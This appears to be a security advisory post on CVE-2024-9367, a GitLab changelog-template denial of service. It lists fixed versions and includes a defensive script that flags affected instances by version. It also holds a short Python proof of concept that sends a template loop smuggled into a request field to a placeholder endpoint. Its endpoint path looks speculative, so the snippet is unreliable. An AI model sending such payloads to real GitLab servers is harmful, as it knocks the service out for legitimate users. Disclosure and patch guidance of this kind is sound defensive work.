A vulnerability tracked as CVE-2024-9367 was recently disclosed in GitLab CE/EE (Community Edition and Enterprise Edition). It affects all versions starting from 13.9 and lies in the parsing of the templates used to generate changelogs. Successful exploitation can cause a Denial of Service (DoS) condition through uncontrolled CPU consumption. This article covers the affected GitLab versions, how an attacker might trigger the issue, and the fix GitLab has provided.

Exploit Details

The issue lies in how GitLab parses the templates used to generate changelogs. A crafted template drives CPU usage on the GitLab instance high enough to produce a Denial of Service (DoS): legitimate users are deprived of the service because the instance's CPU resources are exhausted.

Here's a code snippet illustrating a potential exploit of this vulnerability:

import requests

# Changelog-generation endpoint of the target instance (placeholders, as in the original).
target_url = "https://<target-gitlab-url>/projects/<project-id>/generate_changelog"

headers = {
    "Content-Type": "application/json",
    "PRIVATE-TOKEN": "<attacker-token>"
}

# Request body whose "to" field smuggles a template loop into the changelog parser.
malformed_data = """
{
  "from": "2024-01-01T00:00:00Z",
  "to": "}{% for i in (1..999999) %} CVE-2024-9367 {% endfor %}"
}
"""

response = requests.post(target_url, headers=headers, data=malformed_data)

print(response.status_code)

In this snippet, the attacker sends a crafted JSON body (malformed_data) that triggers the uncontrolled CPU consumption once the template engine parses it.

GitLab Advisory and Workaround

GitLab was informed of the vulnerability and acknowledged it in an official security advisory. The GitLab Security Team has released fixed versions. Affected users are advised to upgrade to one of the following:

- GitLab CE/EE 17.4.6 and later
- GitLab CE/EE 17.5.4 and later
- GitLab CE/EE 17.6.2 and later

To upgrade your GitLab instance to one of these secure versions, follow the official GitLab documentation on upgrading: https://docs.gitlab.com/ee/update/
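The version boundaries above can be turned into a simple inventory check: given the version string reported by an instance, decide whether it still needs the upgrade and which release in its own branch closes the gap. The following is an added example written for this article, not GitLab code. It takes the boundaries from the advisory text above (affected from 13.9; fixed in 17.4.6, 17.5.4 and 17.6.2) and assumes that every release numbered above 17.6.2, such as 17.7.x, also carries the fix, and that branches older than 17.4 received no backport.

```python
"""Classify GitLab CE/EE version strings against CVE-2024-9367.

Added example, not GitLab's own code. Boundaries come from the advisory:
affected from 13.9 onward, fixed in 17.4.6 / 17.5.4 / 17.6.2. Assumption:
releases above 17.6.2 (e.g. 17.7.x) include the fix; branches below 17.4
were never patched and must move to 17.4.6 or later.
"""
from typing import Dict, Optional, Tuple

Version = Tuple[int, int, int]

FIRST_AFFECTED: Version = (13, 9, 0)

# (major, minor) branch -> first fixed release in that branch, per the advisory.
FIXED_BY_BRANCH: Dict[Tuple[int, int], Version] = {
    (17, 4): (17, 4, 6),
    (17, 5): (17, 5, 4),
    (17, 6): (17, 6, 2),
}
OLDEST_FIXED: Version = min(FIXED_BY_BRANCH.values())  # 17.4.6


def parse_version(text: str) -> Version:
    """Parse '17.5.3', '17.5.3-ee' or 'v17.4.6' into a (major, minor, patch) tuple.

    Edition suffixes such as '-ee' are dropped; a missing patch number is read as 0.
    """
    core = text.strip().lstrip("v").split("-")[0]
    parts = core.split(".")
    if not 2 <= len(parts) <= 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised GitLab version string: {text!r}")
    nums = [int(p) for p in parts] + [0] * (3 - len(parts))
    return nums[0], nums[1], nums[2]


def is_affected(text: str) -> bool:
    """Return True when the given release is in the vulnerable range."""
    v = parse_version(text)
    if v < FIRST_AFFECTED:
        return False  # before 13.9: the vulnerable template parsing is not present
    branch = (v[0], v[1])
    if branch in FIXED_BY_BRANCH:
        return v < FIXED_BY_BRANCH[branch]  # patched only from the fixed release onward
    # Branches without a fixed release: everything older than 17.4 stays vulnerable,
    # everything newer than 17.6 is assumed to ship with the fix.
    return branch < (17, 4)


def recommended_upgrade(text: str) -> Optional[str]:
    """Smallest fixed release to move to, or None when the instance is not affected."""
    if not is_affected(text):
        return None
    branch = parse_version(text)[:2]
    target = FIXED_BY_BRANCH.get(branch, OLDEST_FIXED)
    return ".".join(str(n) for n in target)


if __name__ == "__main__":
    # Constructed sample inventory, one version string per instance.
    for instance, version in [("ci-01", "17.5.3-ee"), ("ci-02", "16.11.10"), ("ci-03", "17.7.0")]:
        print(instance, version, "affected" if is_affected(version) else "ok", recommended_upgrade(version))
```

Feed it the version each instance reports (for example from the admin area or the `/api/v4/version` endpoint) and act on every row that comes back as affected; a branch without its own fixed release has to jump to 17.4.6 or later rather than wait for a backport.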

Conclusion

CVE-2024-9367 can cause a Denial of Service (DoS) condition in affected GitLab CE/EE instances. Users and administrators should upgrade to a fixed version to remove the risk of uncontrolled CPU consumption. Following GitLab security advisories and applying patches promptly keeps this vulnerability from being exploited against their instances.

Timeline

Published on: 12/12/2024 12:15:28 UTC